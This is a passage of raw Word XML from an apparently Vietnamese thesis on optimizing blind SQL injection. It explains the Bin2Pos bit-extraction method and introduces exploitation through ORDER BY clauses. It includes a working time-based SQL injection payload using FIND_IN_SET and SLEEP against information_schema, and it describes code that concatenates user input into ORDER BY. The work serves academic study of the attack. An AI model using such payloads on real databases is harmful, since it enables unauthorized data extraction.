        <w:t>Phương pháp này là một sự nâng cấp của phương pháp dịch bit ở trên, được tác giả Roberto Salgado trình bày tại hội thảo BackHat US 2013 với chủ đề: “SQL Injection Optimization and Obfuscation Techniques”. Nếu như trong phương pháp dịch bit cơ bản tập ký tự đầu vào là 128 ký tự (không phân biệt ký tự nhìn được và không nhìn được). Một vấn đề khác là ký tự nào cũng cần 7 lần yêu cầu để  xác định, trong khi có những ký tự, khi chuyển sang dạng nhị phân có độ dài chỉ là 3, nên thực tế chỉ cần 3 yêu cầu là xác định được. Phương pháp Bin2Pos này sẽ thực hiện giới hạn lại tập các ký tự có thể, sau đó đánh chỉ số (index) cho các phần tử này. Trong mỗi lần yêu cầu, câu truy vấn sẽ thực hiện so sánh để lấy ra chỉ số đó, chuyển sang dạng nhị phân và thực hiện trích xuất từng bit một.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp tối ưu bằng cách dùng phép dịch bit dựa vào kết quả đã được đánh chỉ mục đưa ra để khắc phục các nhược điểm đó. Đầu tiên phương pháp sẽ sử dụng kỹ thuật đánh chỉ mục kết quả để giới hạn lại tập các ký tự cần kiểm tra. Đối với hệ quản trị CSDL MySQL thì sử dụng hàm FIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D_IN_SET. Mã tấn công có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&amp;,*,(,),,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kết quả trả về chính là vị trí của ký tự trong danh sách. Giả sử ký tự là ‘c’ thì sẽ trả về kết quả là 3. Tiếp theo sẽ sử dụng phương pháp dịch bit giống như trên, sử dụng hàm BIN() để chuyển về dạng nhị phân. BIN(3) là 11, cần 3 yêu cầu để xác định: Bit đầu tiên là 1 ? Đúng. Bit thứ hai là 1 ?Đúng ? Bit thứ ba là 1 ? Không, không có bit thứ ba, thực hiện tạo Sleep để báo hiệu kết thúc chuỗi Binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ trên tập danh sách dài 45, BIN(45) là 101101 cũng chỉ mất 7 yêu cầu truy vấn cho ký tự ở vị trí cuối cùng của danh sách.</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02062B8D" wp14:editId="41C182E9">
            <wp:extent cx="5610134" cy="2165299"/>
            <wp:effectExtent l="1905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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5618273" cy="2168441"/>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75" w:name="_Toc458436425"/>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13</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Ví dụ với từ CHARACTER_SET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu như ở phương pháp dịch bit trên, bắt buộc để xác định một ký tự cần dùng đủ 7 bit, thì phương pháp này cho phép dùng ít hơn 7 yêu cầu. Cụ thể số yêu cầu tối đa ở đây là 6. Số lượng yêu cầu phụ thuộc vào số bit cần thiết để biểu diễn vị trí của ký tự trong tập danh sách. Có thể làm được như vậy vì trường hợp ký tự kết thúc chuỗi sẽ trả về một khoảng thời gian delay. Số yêu cầu cần thiết là: số bit biểu diễn bit cộng với 1. Trường hợp số bit là 6 sẽ không cần thêm yêu cầu cuối nữa, vì nó chắc chắn là yêu cầu bị delay, do độ dài tối đa là 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc459374335"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Hướng tiếp cận mới trong khai thác lỗ hổng Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phầ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>n trên, luận văn đã trình bày các phương pháp tối ưu hóa Blind SQL injection. Các phương pháp tối ưu hóa khai thác lỗ hổng tập trung vào hai vấn đề chính:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="001D22C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu tập ký tự tìm kiếm: Việc tập tìm kiếm càng được thu hẹp càng làm giảm số lượng bit để thể hiện ký tự, từ đó làm giảm số lượng yêu cầu để xác định các bit này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="001D22C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu về phương pháp xác định giá trị của bit: Đầu tiên là 7 yêu cầu để xác định đủ 7 ký tự, bằng cách đơn giản thêm yêu cầu báo hiệu kết thúc chuỗi, từ đó cho phép giảm các yêu cầu thừa (xác định các bit đã biết trước giá trị). Việc có thể biết kết thúc chuỗi cho phép tiết kiệm nhiều yêu cầu cần gửi đi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="008E4486" w:rsidP="00391D73">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C7F173" wp14:editId="0C869A3A">
            <wp:extent cx="5029835" cy="22098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29835" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4486" w:rsidRPr="005D3C52" w:rsidRDefault="004F69FA" w:rsidP="004F69FA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc458436426"/>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14</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A642F1" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>So sánh số lượng yêu cầu cần gửi trong 03 phương pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00366A23">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong hình trên là bảng so sánh sử dụng 3 phương pháp: Tìm kiếm nhị phân, Dịch bit, Bin2Pos sử dụng Find_In_Set. Các phương pháp tối ưu </w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dựa vào việc kiểm tra yêu cầu gửi lên là Đúng/Sai. Do đó</w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>theo</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> các phương pháp</w:t>
      </w:r>
      <w:r w:rsidR="00366A23" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> này</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> số trạng thái trả về của mỗi yêu cầu chỉ có thể là 2. Luận văn hướng tới một cách tiếp cận khác: Liệu có thể, trong một yêu cầu trả về nhận được nhiều hơn 2 trạng thái hay không ? Nếu như có thể nhận được nhiều hơn 2 trạng thái, thì số lượng yêu cầu chắc chắn sẽ giảm. Giả sử nếu như có thể là 94 trạng thái, thì mỗi trạng thái sẽ đại diện cho một ký tự, và chỉ cần chuyển đổi trạng thái sang ký tự là có thể lấy giá trị của ký tự. 1 yêu cầu cho 1 ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Xuất phát từ ý tưởng đó, luận văn xét đến trường hợp: câu truy vấn trả về nhiều hơn 1 kết quả (row). Nếu như trong phương pháp truyền thống, việc xác định trạng thái Đúng/Sai bằng cách kiểm tra kết quả trả</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> về này có xuất hiện hay không: Nếu có row này trả về là đúng, không có row trả về là sai. Trong trường hợp này, giả sử trả về nhiều hơn 1, khoảng 8 dòng. Giả sử, có thể làm thế nào đó, để sắp xếp các dữ liệu này theo một trật tự, sau đó, phân tích nội dung được hiển thị, rồi tính toán lại để trích xuất ra được giá trị chính xác của ký tự. Phương pháp tiếp cận này dựa trên: Phân tích nội dung thứ tự nội dung trả về của dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002676F" w:rsidRPr="005D3C52" w:rsidRDefault="0002676F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vấn đề đượt đặt ra là: Làm thế nào để có thể trình bày dữ liệu theo ý đồ của kẻ tấn công. Nếu là chữ cái “a” thì trình bày biểu này, chữ cái “b” thì trình bày kiểu khác ?</w:t>
      </w:r>
      <w:r w:rsidR="00B03EBA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong các mệnh đề của SQL, có mệnh đề ORDER BY được sử dụng để sắp xếp lại thứ tự của các row trả về trong truy vấn. Dựa trên ý tưởng này, luận văn đưa ra phương pháp: Sử dụng ORDER BY để trình bày dữ liệu trả về trong truy vấn, từ  đó sử dụng trong việc tối ưu hóa tấn công Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00B03EBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong chương 2, luận văn đã trình bày các phương pháp tối ưu hóa tấn công Blind SQL injection trên thế giới, cũng như giới thiệu một hướng tiếp cận mới trong việc tối ưu. Sang chương tiếp theo, luận văn sẽ trình bày chi tiết về phương pháp tối ưu dựa trên phân tích thứ tự dữ liệu trả về, cũng như chứng minh thực nghiệm của phương pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc459374336"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Chương 3: Đề xuất tối ưu hóa tấn công Blind SQL injection dựa trên phân tích thứ tự nội dung trả về.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc459374337"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Khai thác SQL injection trong mệnh đề ORDER BY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FF02A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc459374338"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mệnh đề Order by trong truy vấn SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông thường, để truy xuất lấy dữ liệu trên máy chủ CSDL, </w:t>
      </w:r>
      <w:r w:rsidR="00DB4D2D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thường sử dụng mệnh đề “SELECT”. Cấu trúc của một truy vấn SQL sử dụng mệnh đề “SELECT”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22D7678F" wp14:editId="3CAC8D2D">
            <wp:extent cx="2450226" cy="2340864"/>
            <wp:effectExtent l="19050" t="0" r="7224"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2"/>
                    <a:srcRect b="1130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2453157" cy="2343664"/>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81" w:name="_Toc458436427"/>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15</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Cấu trúc mệnh đề SELECT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Có thể n</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hận thấy nhiều mệnh đề quen thuộc, ví dụ như WHERE để lọc điều kiện trong truy vấn, LIMIT để giới hạn số lượng kết quả trả về. Trong đó, có thể chú ý đến mệnh đề ORDER BY. Mệnh đề này được sử dụng để sắp xếp dữ liệu trước khi trả về. Cùng phân tích ví dụ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Có bảng users, gồm 4 cột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42B0C1FA" wp14:editId="120E6A5E">
            <wp:extent cx="2534258" cy="1455724"/>
            <wp:effectExtent l="1905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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2543855" cy="1461236"/>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82" w:name="_Toc458436428"/>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16</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Câu lệnh tạo bảng users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tiến hành Insert giá trị vào bảng, kết quả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4E1343C2" wp14:editId="541B3860">
            <wp:extent cx="3181294" cy="3098929"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200717" cy="3117849"/>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83" w:name="_Toc458436429"/>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17</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Kết quả trả về của bảng users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Sử dụng mệnh đề ORDER BY có thể sắp xếp theo thứ tự mong muốn. Thực hiện 2 câu lệnh:“SELECT * FROM users ORDER BY id” (1) và “SELECT * FROM users ORDER BY point” (2). Phân tích kết quả trả về của 02 câu lệnh, trong câu lệnh thứ nhất, các dòng (row) trả về được sắp xếp theo số id, theo chiều tăng dần. Tương tự với câu lệnh thứ hai, các dòng trả về được sắp xếp theo số point. Trường hợp muốn sắp xếp </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>theo thứ tự giảm dần, chỉ cần thêm DESC vào sau mệnh đề ORDER BY. Như vậy, cùng một nội dung trả về, tùy cách sắp xếp dữ liệu mà mỗi truy vấn sẽ cho ra một hình thái kết quả khác nhau (về mặt thứ tự).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FF02A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc459374339"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Việc lấy trực tiếp dữ liệu từ người dùng, rồi truyền thẳng vào truy vấn SQL là nguyên nhân dẫn gây ra lỗ hổng SQL injection. Thông thường, dữ liệu người dùng thường được cộng vào mệnh đề WHERE. Trong một số trường hợp, ứng dụng cho phép người dùng tùy biến việc sắp xếp (theo tên, theo điểm số chẳng hạn). Nếu lập trình viên xử lý không tốt sẽ dẫn đến lỗ hổng SQL injection. Cùng phân tích đoạn mã nguồn sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="334E9EFB" wp14:editId="6A35D06F">
            <wp:extent cx="6095365" cy="28956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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6110901" cy="2902980"/>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85" w:name="_Toc458436430"/>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18</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Mã nguồn chương trình</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00DB4D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>iến $sort từ người dùng được cộng trực tiếp vào sau mệnh đề ORDER BY. Như vậy, kẻ tấn công hoàn toàn có thể điều khiển được phần sau của câu truy vấn. Cần chú ý là mệnh đề ORDER BY dùng để sắp xếp, thao tác các dữ liệu đã có (ở phần trước của mệnh đề ORDER BY), chính vì thế không thể sử dụng kỹ thuật UNION để lấy thêm dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khai thác lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Không giống như khai thác lỗ hổ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ng SQL injection truyền thống, phương pháp khai thác sử dụng UNION không sử dụng được trong trường hợp này (không thể sử dụng UNION sau ORDER BY). Chính vì thế, để khai thác lỗ hổng SQL injection trong trường hợp này cần sử dụng phương pháp Blind SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Trong tấn công khai thác lỗi Blind SQL injection, thông tin không được hiển thị trực quan trong dung nội trả về (thông qua thông báo lỗi, hay qua thông tin có thể thấy được tử CSDL), do đó kẻ tấn công </w:t>
